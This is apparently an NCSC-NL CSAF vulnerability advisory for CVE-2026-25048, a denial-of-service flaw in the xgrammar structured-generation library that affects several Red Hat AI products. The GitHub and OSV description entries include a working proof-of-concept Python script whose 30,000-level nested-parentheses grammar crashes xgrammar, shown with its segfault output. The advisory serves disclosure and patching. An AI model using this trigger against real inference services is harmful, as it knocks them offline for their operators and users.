{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-25048",
        "tracking": {
            "current_release_date": "2026-03-26T00:30:00.370934Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-25048",
            "initial_release_date": "2026-03-05T16:27:05.464196Z",
            "revision_history": [
                {
                    "date": "2026-03-05T16:27:05.464196Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T16:27:10.224828Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-05T16:39:02.034095Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T16:39:03.373718Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T18:39:11.845522Z",
                    "number": "5",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-05T18:41:06.738456Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-05T18:41:10.565969Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-05T21:40:06.238127Z",
                    "number": "8",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-06T00:27:34.218404Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (17).| Product Identifiers created (3).| Product Remediations created (17).| References created (4).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-06T00:27:41.694883Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T00:37:03.307092Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (24).| Product Identifiers created (34).| Products created (11).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-06T00:37:16.062898Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-06T14:58:40.066666Z",
                    "number": "13",
                    "summary": "Source created.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-11T16:37:55.472318Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-13T18:24:50.489869Z",
                    "number": "15",
                    "summary": "CVSS created.| Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-13T18:24:53.232816Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-20T09:49:12.350529Z",
                    "number": "17",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-20T09:49:14.508733Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:29:39.241332Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (2).| Product Remediations created (4).| Product Identifiers created (2).| Product Identifiers removed (2).| References created (15).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T00:29:42.221113Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "20"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-2858641",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ai_inference_server:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat AI Inference Server"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/3.2",
                                        "product": {
                                            "name": "vers:rpm/3.2",
                                            "product_id": "CSAFPID-5277237",
                                            "product_identification_helper": {
                                                "cpe": "cpe:/a:redhat:ai_inference_server:3.2::el9"
                                            }
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "Red Hat AI Inference Server 3.2"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:oci/1774351144",
                                        "product": {
                                            "name": "vers:oci/1774351144",
                                            "product_id": "CSAFPID-5912784",
                                            "product_identification_helper": {
                                                "purl": "pkg:oci/vllm-cuda-rhel9@sha256%3Aee2846fae19a57151e878992484359bb834d91cada6b53c58e5c2a0b5675aa68?arch=arm64&repository_url=registry.redhat.io/rhaiis&tag=1774351144"
                                            }
                                        }
                                    },
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2858642"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "vllm-cuda-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2858643"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "vllm-rocm-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-3112098"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "vllm-tpu-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat AI Inference Server"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-5198605",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:enterprise_linux_ai:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux AI (RHEL AI) 3"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/unknown",
                                "product": {
                                    "name": "vers:rpm/unknown",
                                    "product_id": "CSAFPID-1439279",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:openshift_ai"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5206383"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "bootc-aws-cuda-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5206384"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "bootc-azure-cuda-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5205180"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "bootc-cuda-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5198606"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "bootc-gcp-cuda-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux AI (RHEL AI) 3"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5119808"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-kserve-agent-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5119810"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-kserve-controller-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5119811"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-kserve-router-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5119813"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-kserve-storage-initializer-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5206388"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-vllm-cuda-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5206389"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-vllm-gaudi-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5206390"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "odh-vllm-rocm-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat OpenShift AI (RHOAI)"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.0",
                                "product": {
                                    "name": "vers:unknown/0.1.0",
                                    "product_id": "CSAFPID-3079518",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.1",
                                "product": {
                                    "name": "vers:unknown/0.1.1",
                                    "product_id": "CSAFPID-3079515",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.10",
                                "product": {
                                    "name": "vers:unknown/0.1.10",
                                    "product_id": "CSAFPID-3079516",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.10"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.11",
                                "product": {
                                    "name": "vers:unknown/0.1.11",
                                    "product_id": "CSAFPID-3079522",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.11"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.12",
                                "product": {
                                    "name": "vers:unknown/0.1.12",
                                    "product_id": "CSAFPID-3079520",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.12"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.13",
                                "product": {
                                    "name": "vers:unknown/0.1.13",
                                    "product_id": "CSAFPID-3079524",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.13"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.14",
                                "product": {
                                    "name": "vers:unknown/0.1.14",
                                    "product_id": "CSAFPID-3079530",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.14"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.15",
                                "product": {
                                    "name": "vers:unknown/0.1.15",
                                    "product_id": "CSAFPID-3079532",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.15"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.16",
                                "product": {
                                    "name": "vers:unknown/0.1.16",
                                    "product_id": "CSAFPID-3079533",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.16"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.17",
                                "product": {
                                    "name": "vers:unknown/0.1.17",
                                    "product_id": "CSAFPID-3079529",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.17"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.18",
                                "product": {
                                    "name": "vers:unknown/0.1.18",
                                    "product_id": "CSAFPID-3079528",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.18"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.19",
                                "product": {
                                    "name": "vers:unknown/0.1.19",
                                    "product_id": "CSAFPID-3079526",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.19"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.2",
                                "product": {
                                    "name": "vers:unknown/0.1.2",
                                    "product_id": "CSAFPID-3079517",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.20",
                                "product": {
                                    "name": "vers:unknown/0.1.20",
                                    "product_id": "CSAFPID-3079525",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.20"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.21",
                                "product": {
                                    "name": "vers:unknown/0.1.21",
                                    "product_id": "CSAFPID-5765229",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.21"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.22",
                                "product": {
                                    "name": "vers:unknown/0.1.22",
                                    "product_id": "CSAFPID-5765230",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.22"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.23",
                                "product": {
                                    "name": "vers:unknown/0.1.23",
                                    "product_id": "CSAFPID-3101527",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:mlc-ai:xgrammar:0.1.23:*:*:*:*:*:*:*",
                                        "purl": "pkg:pypi/xgrammar@0.1.23"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.24",
                                "product": {
                                    "name": "vers:unknown/0.1.24",
                                    "product_id": "CSAFPID-5765231",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.24"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.25",
                                "product": {
                                    "name": "vers:unknown/0.1.25",
                                    "product_id": "CSAFPID-5765232",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.25"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.26",
                                "product": {
                                    "name": "vers:unknown/0.1.26",
                                    "product_id": "CSAFPID-5765233",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.26"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.27",
                                "product": {
                                    "name": "vers:unknown/0.1.27",
                                    "product_id": "CSAFPID-5765234",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.27"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.28",
                                "product": {
                                    "name": "vers:unknown/0.1.28",
                                    "product_id": "CSAFPID-5765235",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.28"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.29",
                                "product": {
                                    "name": "vers:unknown/0.1.29",
                                    "product_id": "CSAFPID-5765236",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.29"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.3",
                                "product": {
                                    "name": "vers:unknown/0.1.3",
                                    "product_id": "CSAFPID-3079527",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.30",
                                "product": {
                                    "name": "vers:unknown/0.1.30",
                                    "product_id": "CSAFPID-5765237",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.30"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.31",
                                "product": {
                                    "name": "vers:unknown/0.1.31",
                                    "product_id": "CSAFPID-5765238",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.31"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.4",
                                "product": {
                                    "name": "vers:unknown/0.1.4",
                                    "product_id": "CSAFPID-3079523",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.4rc2",
                                "product": {
                                    "name": "vers:unknown/0.1.4rc2",
                                    "product_id": "CSAFPID-3235103",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.4rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.5",
                                "product": {
                                    "name": "vers:unknown/0.1.5",
                                    "product_id": "CSAFPID-3079534",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.5rc1",
                                "product": {
                                    "name": "vers:unknown/0.1.5rc1",
                                    "product_id": "CSAFPID-3235104",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.5rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.6",
                                "product": {
                                    "name": "vers:unknown/0.1.6",
                                    "product_id": "CSAFPID-3079531",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.7",
                                "product": {
                                    "name": "vers:unknown/0.1.7",
                                    "product_id": "CSAFPID-3079514",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.8",
                                "product": {
                                    "name": "vers:unknown/0.1.8",
                                    "product_id": "CSAFPID-3079519",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/0.1.9",
                                "product": {
                                    "name": "vers:unknown/0.1.9",
                                    "product_id": "CSAFPID-3079521",
                                    "product_identification_helper": {
                                        "purl": "pkg:pypi/xgrammar@0.1.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<0.1.32",
                                "product": {
                                    "name": "vers:unknown/<0.1.32",
                                    "product_id": "CSAFPID-5762372",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:mlc-ai:xgrammar:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<0.1.32",
                                "product": {
                                    "name": "vers:unknown/>=0|<0.1.32",
                                    "product_id": "CSAFPID-5765239"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "xgrammar"
                    }
                ],
                "category": "vendor",
                "name": "mlc-ai"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-25048",
            "cwe": {
                "id": "CWE-674",
                "name": "Uncontrolled Recursion"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-25048"
                },
                {
                    "category": "description",
                    "text": "xgrammar is an open-source library for efficient, flexible, and portable structured generation. Prior to version 0.1.32, the multi-level nested syntax caused a segmentation fault (core dumped). This issue has been patched in version 0.1.32.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-25048"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nThe multi-level nested syntax caused a segmentation fault (core dump).\n\n\n### Details\n\nA trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.\n\n### PoC\n\n```\n#!/usr/bin/env python3\n\"\"\"\nXGrammar - Math Expression Generation Example\n\"\"\"\n\nimport xgrammar as xgr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\ns = '(' * 30000 + 'a'\ngrammar = f\"root ::= {s}\"\n\ndef main():\n    device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    model_name = \"Qwen/Qwen2.5-0.5B-Instruct\"\n    \n    # Load model\n    model = AutoModelForCausalLM.from_pretrained(\n        model_name,\n        torch_dtype=torch.float16 if device == \"cuda\" else torch.float32,\n        device_map=device\n    )\n    tokenizer = AutoTokenizer.from_pretrained(model_name)\n    config = AutoConfig.from_pretrained(model_name)\n    \n    # Math expression grammar\n    math_grammar = grammar\n    \n    # Setup\n    tokenizer_info = xgr.TokenizerInfo.from_huggingface(\n        tokenizer,\n        vocab_size=config.vocab_size\n    )\n    compiler = xgr.GrammarCompiler(tokenizer_info)\n    compiled_grammar = compiler.compile_grammar(math_grammar)\n    \n    # Generate\n    prompt = \"Math: \"\n    inputs = tokenizer(prompt, return_tensors=\"pt\").to(device)\n    \n    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)\n    \n    output_ids = model.generate(\n        **inputs,\n        max_new_tokens=50,\n        logits_processor=[xgr_processor]\n    )\n    \n    result = tokenizer.decode(\n        output_ids[0][len(inputs.input_ids[0]):],\n        skip_special_tokens=True\n    )\n    \n    print(f\"Generated expression: {result}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n\n```\n> pip show xgrammar\nName: xgrammar\nVersion: 0.1.31\nSummary: Efficient, Flexible and Portable Structured Generation\nHome-page: \nAuthor: MLC Team\nAuthor-email: \nLicense: Apache 2.0\nLocation: /home/yuelinwang/.local/lib/python3.10/site-packages\nRequires: numpy, pydantic, torch, transformers, triton, typing-extensions\nRequired-by: \n\n> python3 1.py \n`torch_dtype` is deprecated! Use `dtype` instead!\nSegmentation fault (core dumped)\n```\n\n\n### Impact\n\nDoS",
                    "title": "github - https://github.com/advisories/GHSA-7rgv-gqhr-fxg3"
                },
                {
                    "category": "description",
                    "text": "No description is available for this CVE.",
                    "title": "redhat - https://access.redhat.com/security/cve/CVE-2026-25048"
                },
                {
                    "category": "description",
                    "text": "### Summary\n\nThe multi-level nested syntax caused a segmentation fault (core dump).\n\n\n### Details\n\nA trigger stack overflow or memory exhaustion was caused by constructing a malicious grammar rule containing 30,000 layers of nested parentheses.\n\n### PoC\n\n```\n#!/usr/bin/env python3\n\"\"\"\nXGrammar - Math Expression Generation Example\n\"\"\"\n\nimport xgrammar as xgr\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, AutoConfig\n\ns = '(' * 30000 + 'a'\ngrammar = f\"root ::= {s}\"\n\ndef main():\n    device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    model_name = \"Qwen/Qwen2.5-0.5B-Instruct\"\n    \n    # Load model\n    model = AutoModelForCausalLM.from_pretrained(\n        model_name,\n        torch_dtype=torch.float16 if device == \"cuda\" else torch.float32,\n        device_map=device\n    )\n    tokenizer = AutoTokenizer.from_pretrained(model_name)\n    config = AutoConfig.from_pretrained(model_name)\n    \n    # Math expression grammar\n    math_grammar = grammar\n    \n    # Setup\n    tokenizer_info = xgr.TokenizerInfo.from_huggingface(\n        tokenizer,\n        vocab_size=config.vocab_size\n    )\n    compiler = xgr.GrammarCompiler(tokenizer_info)\n    compiled_grammar = compiler.compile_grammar(math_grammar)\n    \n    # Generate\n    prompt = \"Math: \"\n    inputs = tokenizer(prompt, return_tensors=\"pt\").to(device)\n    \n    xgr_processor = xgr.contrib.hf.LogitsProcessor(compiled_grammar)\n    \n    output_ids = model.generate(\n        **inputs,\n        max_new_tokens=50,\n        logits_processor=[xgr_processor]\n    )\n    \n    result = tokenizer.decode(\n        output_ids[0][len(inputs.input_ids[0]):],\n        skip_special_tokens=True\n    )\n    \n    print(f\"Generated expression: {result}\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\n\n\n```\n> pip show xgrammar\nName: xgrammar\nVersion: 0.1.31\nSummary: Efficient, Flexible and Portable Structured Generation\nHome-page: \nAuthor: MLC Team\nAuthor-email: \nLicense: Apache 2.0\nLocation: /home/yuelinwang/.local/lib/python3.10/site-packages\nRequires: numpy, pydantic, torch, transformers, triton, typing-extensions\nRequired-by: \n\n> python3 1.py \n`torch_dtype` is deprecated! Use `dtype` instead!\nSegmentation fault (core dumped)\n```\n\n\n### Impact\n\nDoS",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/PyPI%2FGHSA-7rgv-gqhr-fxg3.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "A flaw was found in xgrammar, an open-source library for structured generation. This vulnerability allows an attacker to trigger a segmentation fault, causing the program to crash and resulting in a Denial of Service (DoS). The issue occurs due to improper handling of multi-level nested syntax.",
                    "title": "redhat - https://access.redhat.com/hydra/rest/securitydata/csaf/RHSA-2026:5809.json"
                },
                {
                    "category": "other",
                    "text": "0.00052",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
                    "title": "CVSSV4"
                },
                {
                    "category": "other",
                    "text": "8.7",
                    "title": "CVSSV4 base score"
                },
                {
                    "category": "other",
                    "text": "4.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "VENDOR FIX as product remediation category",
                    "title": "NCSC Score top increasing factors"
                },
                {
                    "category": "other",
                    "text": "There is product_remediation data available from source Redhat, There is exploit data available from source Nvd",
                    "title": "NCSC Score top decreasing factors"
                },
                {
                    "category": "details",
                    "text": "Severity: 3\n",
                    "title": "Vendor assessment"
                }
            ],
            "product_status": {
                "fixed": [
                    "CSAFPID-5912784"
                ],
                "known_affected": [
                    "CSAFPID-5762372",
                    "CSAFPID-1439279",
                    "CSAFPID-2858641",
                    "CSAFPID-2858642",
                    "CSAFPID-2858643",
                    "CSAFPID-3112098",
                    "CSAFPID-5119808",
                    "CSAFPID-5119810",
                    "CSAFPID-5119811",
                    "CSAFPID-5119813",
                    "CSAFPID-5198605",
                    "CSAFPID-5198606",
                    "CSAFPID-5205180",
                    "CSAFPID-5206383",
                    "CSAFPID-5206384",
                    "CSAFPID-5206388",
                    "CSAFPID-5206389",
                    "CSAFPID-5206390",
                    "CSAFPID-3079514",
                    "CSAFPID-3079515",
                    "CSAFPID-3079516",
                    "CSAFPID-3079517",
